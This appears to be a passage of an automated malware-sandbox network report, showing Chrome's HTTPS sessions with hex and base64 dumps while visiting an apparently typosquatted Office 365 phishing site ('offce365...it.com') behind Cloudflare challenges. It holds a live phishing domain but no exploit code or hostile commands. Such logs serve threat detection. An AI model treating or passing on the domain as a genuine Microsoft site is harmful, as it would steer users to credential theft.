                                                                                        Data Ascii: IlpYbGNOKStoaGlgSVdgbko4aFxmdEh/P1h3Qz+AV4ZlfUh0RnaIhZGDYlxSaYFzh4trd5t6XpGWn3uMbpuXhp2di5mVh2iDoWuycIyWf6WJhXi4e7N/rpDCxHybuH2gnrisvKTDjZ2Zwa+jkZbGp6bZyNGqppGX3syyscHe3bDcx7m/n+bureq87cjU1PLM4fjH1M+92LjO3Lzku+XP39TAyPrZ2wr9+sjJxhfMEQT6+vAbFgkh89MXEg0X+OA
                                                                                        2025-03-24 04:00:07 UTC1369INData Raw: 55 68 66 58 6b 70 75 5a 45 42 6e 4e 46 46 44 4e 48 63 35 58 55 35 74 67 6a 52 72 64 56 61 43 56 58 78 2b 5a 6e 4e 49 6a 58 78 64 68 34 71 53 69 6d 61 57 6c 49 61 41 61 47 69 4e 56 35 35 77 55 5a 5a 30 59 5a 79 68 66 48 68 77 59 4a 68 33 6e 36 61 49 5a 36 69 50 62 57 36 74 69 70 4a 7a 71 6e 69 36 68 62 57 35 62 33 43 49 6d 36 71 62 74 35 53 57 66 37 32 49 6e 37 32 6a 76 35 36 57 6f 49 6a 4e 6e 36 72 44 70 72 57 75 7a 70 62 44 32 35 69 63 33 72 37 53 30 35 75 38 31 74 7a 51 76 72 37 69 36 38 58 44 34 38 4b 37 77 73 75 37 31 50 48 4d 38 62 2f 72 30 65 71 79 36 72 76 63 39 76 54 39 2b 41 58 43 75 38 55 45 35 4d 58 6c 36 4e 76 73 35 52 44 4e 41 76 4d 52 30 75 38 45 46 4e 67 4a 46 52 33 54 39 66 66 78 31 78 4d 67 44 43 45 6b 41 68 4d 47 49 50 51 49 36 52 59 6f
                                                                                        Data Ascii: UhfXkpuZEBnNFFDNHc5XU5tgjRrdVaCVXx+ZnNIjXxdh4qSimaWlIaAaGiNV55wUZZ0YZyhfHhwYJh3n6aIZ6iPbW6tipJzqni6hbW5b3CIm6qbt5SWf72In72jv56WoIjNn6rDprWuzpbD25ic3r7S05u81tzQvr7i68XD48K7wsu71PHM8b/r0eqy6rvc9vT9+AXCu8UE5MXl6Nvs5RDNAvMR0u8EFNgJFR3T9ffx1xMgDCEkAhMGIPQI6RYo
                                                                                        2025-03-24 04:00:07 UTC1369INData Raw: 56 7a 4f 47 67 77 4c 58 4e 39 53 56 42 71 65 49 49 2b 51 6d 31 76 4f 56 67 2f 57 32 42 57 52 6f 78 68 57 32 4f 4d 61 6c 36 46 55 57 4e 69 64 33 61 53 62 57 32 4d 6b 33 43 50 6a 48 5a 76 58 70 78 76 66 71 56 30 66 47 52 6c 6d 6d 64 73 6a 33 71 67 73 4b 74 30 64 4c 4a 7a 71 4c 75 48 74 4a 71 4e 72 4d 4c 43 6d 33 61 46 6c 4c 6d 2b 65 37 69 66 66 6f 62 46 72 61 7a 41 72 36 32 6d 79 74 54 4f 6d 4e 69 35 30 4b 71 37 76 4c 53 63 7a 64 69 68 6d 37 65 30 74 4c 4c 46 78 72 6d 32 78 2b 57 76 77 75 2f 79 76 63 58 69 78 61 33 44 71 37 61 79 35 39 76 4a 36 38 2f 4f 7a 72 6e 59 38 77 66 41 33 74 6a 32 44 41 6b 4f 2f 67 44 50 42 76 30 43 44 78 55 4f 31 77 30 44 32 68 49 56 7a 2b 2f 38 44 2b 34 4f 49 68 77 4f 48 69 4d 67 32 2b 72 6d 49 69 44 32 43 79 49 52 44 76 49 42 4a
                                                                                        Data Ascii: VzOGgwLXN9SVBqeII+Qm1vOVg/W2BWRoxhW2OMal6FUWNid3aSbW2Mk3CPjHZvXpxvfqV0fGRlmmdsj3qgsKt0dLJzqLuHtJqNrMLCm3aFlLm+e7iffobFrazAr62mytTOmNi50Kq7vLSczdihm7e0tLLFxrm2x+Wvwu/yvcXixa3Dq7ay59vJ68/OzrnY8wfA3tj2DAkO/gDPBv0CDxUO1w0D2hIVz+/8D+4OIhwOHiMg2+rmIiD2CyIRDvIBJ
                                                                                        2025-03-24 04:00:07 UTC1369INData Raw: 77 62 58 35 49 4f 46 70 77 59 49 56 6b 54 30 53 44 68 34 79 42 57 31 65 42 62 59 6d 45 5a 57 4e 74 6b 46 46 75 63 6c 65 62 64 33 6d 4a 64 71 46 66 6f 6e 6c 78 6a 6e 4b 6d 6d 33 74 63 6f 58 39 38 65 6f 36 61 6a 71 43 42 6a 6f 36 4a 73 6f 71 4c 69 58 6c 38 75 5a 43 36 71 70 2b 43 64 5a 71 4f 75 62 75 57 6b 38 6a 4c 71 38 4b 65 70 61 69 61 75 36 32 4c 30 62 61 69 79 73 50 4e 6d 72 4b 61 6d 38 65 65 31 37 75 76 72 4e 61 38 6f 4f 69 38 79 39 50 6a 79 36 76 46 79 4d 62 4c 35 2f 44 6d 73 63 44 6a 74 64 54 6c 76 4e 33 6e 79 66 50 31 79 67 58 61 35 4f 4f 2f 32 51 6e 32 79 67 50 37 32 42 44 51 44 77 66 30 34 66 44 65 39 52 4c 6a 45 68 67 48 44 52 76 5a 37 4e 73 64 34 75 54 76 37 39 38 6e 4b 4f 54 37 36 2f 63 4c 4a 2f 41 78 4b 75 72 71 2f 67 62 75 4d 68 55 4f 44 78
                                                                                        Data Ascii: wbX5IOFpwYIVkT0SDh4yBW1eBbYmEZWNtkFFuclebd3mJdqFfonlxjnKmm3tcoX98eo6ajqCBjo6JsoqLiXl8uZC6qp+CdZqOubuWk8jLq8Kepaiau62L0baiysPNmrKam8ee17uvrNa8oOi8y9Pjy6vFyMbL5/DmscDjtdTlvN3nyfP1ygXa5OO/2Qn2ygP72BDQDwf04fDe9RLjEhgHDRvZ7Nsd4uTv798nKOT76/cLJ/AxKurq/gbuMhUODx
                                                                                        2025-03-24 04:00:07 UTC1369INData Raw: 4f 32 46 78 66 6e 64 6b 67 45 47 42 50 30 78 34 58 47 35 37 5a 57 46 53 62 49 79 4b 67 34 4e 33 61 70 79 57 69 31 6d 67 6d 59 74 66 68 6c 79 54 63 32 61 6a 61 71 53 6d 6d 71 42 39 67 6f 53 6d 61 6f 39 78 6b 70 56 78 71 4a 70 34 6d 4c 2b 54 6a 62 54 44 73 6f 79 37 6d 4a 61 59 67 72 2b 2b 74 34 69 74 75 4a 2b 75 69 38 4b 52 6a 74 57 4e 79 70 65 53 6c 4e 44 4b 74 37 37 63 31 4c 2b 56 31 71 50 6c 35 4e 37 56 6f 72 6e 65 75 36 6e 65 35 36 75 77 35 38 69 2f 30 2b 76 4c 79 4b 7a 75 35 38 62 4f 32 2b 6f 42 37 4f 51 41 38 77 58 67 32 2b 54 57 42 75 6a 58 79 51 6b 43 45 65 62 79 36 41 51 46 34 77 48 78 30 66 44 61 35 52 58 34 38 69 44 68 39 77 34 55 2f 76 54 6b 42 42 30 64 39 76 63 50 49 67 6f 77 4c 51 33 78 4a 50 34 4a 43 52 49 58 2b 68 34 47 44 2f 30 33 51 43 33
                                                                                        Data Ascii: O2FxfndkgEGBP0x4XG57ZWFSbIyKg4N3apyWi1mgmYtfhlyTc2ajaqSmmqB9goSmao9xkpVxqJp4mL+TjbTDsoy7mJaYgr++t4ituJ+ui8KRjtWNypeSlNDKt77c1L+V1qPl5N7Vorneu6ne56uw58i/0+vLyKzu58bO2+oB7OQA8wXg2+TWBujXyQkCEeby6AQF4wHx0fDa5RX48iDh9w4U/vTkBB0d9vcPIgowLQ3xJP4JCRIX+h4GD/03QC3
                                                                                        2025-03-24 04:00:07 UTC1369INData Raw: 6a 31 31 53 46 78 49 69 33 32 45 68 46 4e 75 69 70 5a 67 6c 35 69 45 5a 33 4e 75 63 6c 61 54 6c 6f 4f 65 6a 32 57 62 6f 6f 52 6a 70 48 56 2f 68 4b 2b 5a 59 34 69 72 6a 58 4f 54 71 33 65 36 62 48 47 45 69 4c 69 49 71 58 79 2b 72 62 53 39 70 4c 2b 6e 65 37 54 44 78 4c 65 48 7a 38 65 4a 79 4c 37 49 30 72 48 4e 74 72 61 77 6b 73 79 35 33 72 54 53 32 4b 76 53 31 61 4c 57 34 4b 48 6f 70 4f 7a 43 71 73 4c 49 75 4f 4c 4f 76 62 4b 2f 31 61 37 67 74 66 4c 6f 2b 39 66 2b 76 64 4f 38 7a 62 77 41 37 64 2f 79 79 50 48 54 36 41 62 46 45 41 2f 5a 38 65 37 64 33 75 33 72 7a 77 76 36 31 2f 4d 55 32 78 37 30 32 66 77 6a 2f 75 50 67 41 51 6b 45 38 53 66 33 4c 53 76 74 4c 51 54 75 38 44 41 4f 4d 43 38 54 4a 6a 50 73 44 44 63 77 46 66 63 39 4f 44 67 45 48 41 59 6a 51 7a 77 6a
                                                                                        Data Ascii: j11SFxIi32EhFNuipZgl5iEZ3NuclaTloOej2WbooRjpHV/hK+ZY4irjXOTq3e6bHGEiLiIqXy+rbS9pL+ne7TDxLeHz8eJyL7I0rHNtrawksy53rTS2KvS1aLW4KHopOzCqsLIuOLOvbK/1a7gtfLo+9f+vdO8zbwA7d/yyPHT6AbFEA/Z8e7d3u3rzwv61/MU2x702fwj/uPgAQkE8Sf3LSvtLQTu8DAOMC8TJjPsDDcwFfc9ODgEHAYjQzwj


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        10192.168.2.164972135.190.80.14436272C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-24 04:00:07 UTC584OUTOPTIONS /report/v4?s=5UBk3rQnclcxXKeAPlIheZ9QYWnQ%2BzqjVzkYHto1DL1PB4nncH5Fg6dUbhHeCXiAQKHc36%2FSBtz%2BE3APxMn9Kaxhrg6ctmkYonyYsuEq08YD3g70Zf1nyKaNEHMcPz1Nr2X7N7Q4DHztwHGsUGhentSWXno%3D HTTP/1.1
                                                                                        Host: a.nel.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        Origin: https://offce365.auramisteriosafyr.it.com
                                                                                        Access-Control-Request-Method: POST
                                                                                        Access-Control-Request-Headers: content-type
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-24 04:00:07 UTC336INHTTP/1.1 200 OK
                                                                                        Content-Length: 0
                                                                                        access-control-max-age: 86400
                                                                                        access-control-allow-methods: OPTIONS, POST
                                                                                        access-control-allow-origin: *
                                                                                        access-control-allow-headers: content-type, content-length
                                                                                        date: Mon, 24 Mar 2025 04:00:07 GMT
                                                                                        Via: 1.1 google
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        11192.168.2.164972335.190.80.14436272C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-24 04:00:07 UTC559OUTPOST /report/v4?s=5UBk3rQnclcxXKeAPlIheZ9QYWnQ%2BzqjVzkYHto1DL1PB4nncH5Fg6dUbhHeCXiAQKHc36%2FSBtz%2BE3APxMn9Kaxhrg6ctmkYonyYsuEq08YD3g70Zf1nyKaNEHMcPz1Nr2X7N7Q4DHztwHGsUGhentSWXno%3D HTTP/1.1
                                                                                        Host: a.nel.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        Content-Length: 463
                                                                                        Content-Type: application/reports+json
                                                                                        Origin: https://offce365.auramisteriosafyr.it.com
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-24 04:00:07 UTC463OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 32 36 31 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 6f 66 66 63 65 33 36 35 2e 61 75 72 61 6d 69 73 74 65 72 69 6f 73 61 66 79 72 2e 69 74 2e 63 6f 6d 2f 43 4d 34 6b 4e 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 32 31 30 2e 31 36 38 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65
                                                                                        Data Ascii: [{"age":0,"body":{"elapsed_time":261,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://offce365.auramisteriosafyr.it.com/CM4kN/","sampling_fraction":1.0,"server_ip":"172.67.210.168","status_code":404,"type":"http.error"},"type
                                                                                        2025-03-24 04:00:07 UTC214INHTTP/1.1 200 OK
                                                                                        Content-Length: 0
                                                                                        access-control-allow-origin: *
                                                                                        vary: Origin
                                                                                        date: Mon, 24 Mar 2025 04:00:07 GMT
                                                                                        Via: 1.1 google
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        12192.168.2.1649724104.18.95.414436272C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-24 04:00:07 UTC638OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/738700453:1742786781:0bMVTCrKe1fCs7EDN-2RZn2fetqNFoGDkEtvOP3zshU/92534274b8aa19bf/qg5KjHfcPoZeENQ52Rg65SlJBWTDr6LLKFy69zqQcvI-1742788805-1.1.1.1-5oXn2yBUFWvr3Wf2MuqzEzL61opr0KkokL4MvDDW7gh1I6j9uQT2dHyZ2GaF.nJ1 HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Sec-Fetch-Storage-Access: active
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-24 04:00:08 UTC442INHTTP/1.1 400 Bad Request
                                                                                        Date: Mon, 24 Mar 2025 04:00:07 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 14
                                                                                        Connection: close
                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                        cf-chl-out: S0IG5he9QalSSoW/jJjm/FmvCT1s1dF4ZYmJ9G4+Ofx69T6B3Nol4pBnGvW5CDwZ8ch+/W8H8a7T11XpehHHjg==$aD2YIYvFzucSCFjzZ3MjLg==
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 92534281d9c07b0e-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2025-03-24 04:00:08 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 38 30 7d
                                                                                        Data Ascii: {"err":100280}


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        13192.168.2.1649725104.18.95.414436272C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-24 04:00:08 UTC856OUTGET /cdn-cgi/challenge-platform/h/b/pat/92534274b8aa19bf/1742788807263/6ee634dbbf7ff9584613e98f7de557fe79dd0a00decd0e99ab6d059eb555f365/J5KFquRooOBDcId HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        Cache-Control: max-age=0
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Sec-Fetch-Storage-Access: active
                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/cqb6i/0x4AAAAAAA-tr_eUy_ttfipm/auto/fbE/new/normal/auto/
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-24 04:00:08 UTC143INHTTP/1.1 401 Unauthorized
                                                                                        Date: Mon, 24 Mar 2025 04:00:08 GMT
                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                        Content-Length: 1
                                                                                        Connection: close
                                                                                        2025-03-24 04:00:08 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 62 75 59 30 32 37 39 5f 2d 56 68 47 45 2d 6d 50 66 65 56 58 5f 6e 6e 64 43 67 44 65 7a 51 36 5a 71 32 30 46 6e 72 56 56 38 32 55 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                        Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gbuY0279_-VhGE-mPfeVX_nndCgDezQ6Zq20FnrVV82UAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                        2025-03-24 04:00:08 UTC1INData Raw: 4a
                                                                                        Data Ascii: J


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        14192.168.2.1649727104.18.95.414436272C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-24 04:00:09 UTC827OUTGET /cdn-cgi/challenge-platform/h/b/d/92534274b8aa19bf/1742788807266/t_YM1B0tRxzYOOq HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: image
                                                                                        Sec-Fetch-Storage-Access: active
                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/cqb6i/0x4AAAAAAA-tr_eUy_ttfipm/auto/fbE/new/normal/auto/
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-24 04:00:09 UTC200INHTTP/1.1 200 OK
                                                                                        Date: Mon, 24 Mar 2025 04:00:09 GMT
                                                                                        Content-Type: image/png
                                                                                        Content-Length: 61
                                                                                        Connection: close
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 9253428abdf549aa-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2025-03-24 04:00:09 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 1c 00 00 00 5f 08 02 00 00 00 74 a3 30 01 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                        Data Ascii: PNGIHDR_t0IDAT$IENDB`


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        15192.168.2.1649728104.18.95.414436272C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-24 04:00:09 UTC468OUTGET /cdn-cgi/challenge-platform/h/b/d/92534274b8aa19bf/1742788807266/t_YM1B0tRxzYOOq HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Sec-Fetch-Storage-Access: active
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-24 04:00:09 UTC200INHTTP/1.1 200 OK
                                                                                        Date: Mon, 24 Mar 2025 04:00:09 GMT
                                                                                        Content-Type: image/png
                                                                                        Content-Length: 61
                                                                                        Connection: close
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 9253428d8f0b0f5b-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2025-03-24 04:00:09 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 1c 00 00 00 5f 08 02 00 00 00 74 a3 30 01 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                        Data Ascii: PNGIHDR_t0IDAT$IENDB`


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        16192.168.2.1649729104.18.95.414436272C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-24 04:00:10 UTC1191OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/738700453:1742786781:0bMVTCrKe1fCs7EDN-2RZn2fetqNFoGDkEtvOP3zshU/92534274b8aa19bf/qg5KjHfcPoZeENQ52Rg65SlJBWTDr6LLKFy69zqQcvI-1742788805-1.1.1.1-5oXn2yBUFWvr3Wf2MuqzEzL61opr0KkokL4MvDDW7gh1I6j9uQT2dHyZ2GaF.nJ1 HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        Content-Length: 38966
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                        cf-chl: qg5KjHfcPoZeENQ52Rg65SlJBWTDr6LLKFy69zqQcvI-1742788805-1.1.1.1-5oXn2yBUFWvr3Wf2MuqzEzL61opr0KkokL4MvDDW7gh1I6j9uQT2dHyZ2GaF.nJ1
                                                                                        cf-chl-ra: 0
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        Accept: */*
                                                                                        Origin: https://challenges.cloudflare.com
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Sec-Fetch-Storage-Access: active
                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/cqb6i/0x4AAAAAAA-tr_eUy_ttfipm/auto/fbE/new/normal/auto/
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-24 04:00:10 UTC16384OUTData Raw: 53 5a 6a 34 54 2b 6e 64 31 33 6a 6f 75 76 43 6e 49 37 72 32 6a 2b 32 6e 4d 37 58 34 55 34 2b 6f 6e 48 37 2b 4f 2d 6f 6e 51 37 59 4f 37 57 57 6e 54 38 37 6b 47 4d 37 6e 31 4a 5a 37 59 37 76 4a 31 2d 4d 58 59 37 32 75 6e 45 4c 47 37 38 49 37 35 4f 2b 72 37 7a 4a 4f 37 50 4c 6e 32 6a 37 66 38 37 46 6f 37 38 46 38 37 6e 72 37 6f 4f 64 37 53 34 6e 52 73 37 44 67 53 4a 37 42 6e 4f 2b 50 67 37 33 31 6e 70 52 65 39 34 34 24 36 37 53 31 34 30 43 44 67 37 35 75 37 44 47 4a 67 43 78 44 67 4f 34 6e 35 36 68 6a 37 33 74 46 59 71 77 6f 37 6f 43 32 65 6a 67 59 74 6f 49 44 58 64 59 61 41 37 6e 31 67 37 37 5a 37 74 47 2d 2b 30 77 6a 37 4d 34 50 47 4f 4e 36 64 74 64 72 41 30 47 61 4b 53 64 6a 39 54 64 50 78 6e 52 6b 2b 4f 7a 6b 78 31 57 6f 24 36 51 46 54 58 54 42 2b 38 72
                                                                                        Data Ascii: SZj4T+nd13jouvCnI7r2j+2nM7X4U4+onH7+O-onQ7YO7WWnT87kGM7n1JZ7Y7vJ1-MXY72unELG78I75O+r7zJO7PLn2j7f87Fo78F87nr7oOd7S4nRs7DgSJ7BnO+Pg731npRe944$67S140CDg75u7DGJgCxDgO4n56hj73tFYqwo7oC2ejgYtoIDXdYaA7n1g77Z7tG-+0wj7M4PGON6dtdrA0GaKSdj9TdPxnRk+Ozkx1Wo$6QFTXTB+8r
                                                                                        2025-03-24 04:00:10 UTC16384OUTData Raw: 33 47 53 4e 61 65 50 71 59 39 37 4b 69 41 32 74 39 4f 4f 34 53 30 59 34 37 4c 34 2b 34 37 68 73 52 37 55 4e 70 4d 58 2b 32 2b 77 37 48 73 79 69 47 69 70 47 4a 66 4f 38 47 54 33 65 65 7a 48 55 2b 24 47 66 36 38 51 5a 6f 75 4f 43 66 42 38 53 73 6e 64 37 34 2b 24 4a 37 4a 38 6a 54 46 37 66 50 4e 36 2b 38 73 63 34 71 48 6d 4c 37 4b 4a 37 69 5a 68 73 61 69 30 4e 70 69 7a 35 69 39 75 6e 70 73 35 34 6a 77 70 2d 73 58 4a 32 77 6d 78 73 6d 69 47 34 6e 6b 73 53 69 74 72 55 42 4f 71 42 37 34 2d 48 73 68 69 39 69 61 77 73 51 69 68 6a 2b 69 73 69 69 31 4a 46 37 6e 35 78 45 65 6e 34 6e 6f 37 4c 37 46 58 6e 43 37 75 72 2b 65 37 4a 34 52 34 6f 24 73 73 67 32 46 79 79 4a 24 31 71 6f 37 37 37 78 76 42 75 24 73 36 47 32 6f 6e 38 5a 30 6f 38 31 2d 67 37 73 34 63 67 6e 43 37
                                                                                        Data Ascii: 3GSNaePqY97KiA2t9OO4S0Y47L4+47hsR7UNpMX+2+w7HsyiGipGJfO8GT3eezHU+$Gf68QZouOCfB8Ssnd74+$J7J8jTF7fPN6+8sc4qHmL7KJ7iZhsai0Npiz5i9unps54jwp-sXJ2wmxsmiG4nksSitrUBOqB74-Hshi9iawsQihj+isii1JF7n5xEen4no7L7FXnC7ur+e7J4R4o$ssg2FyyJ$1qo777xvBu$s6G2on8Z0o81-g7s4cgnC7
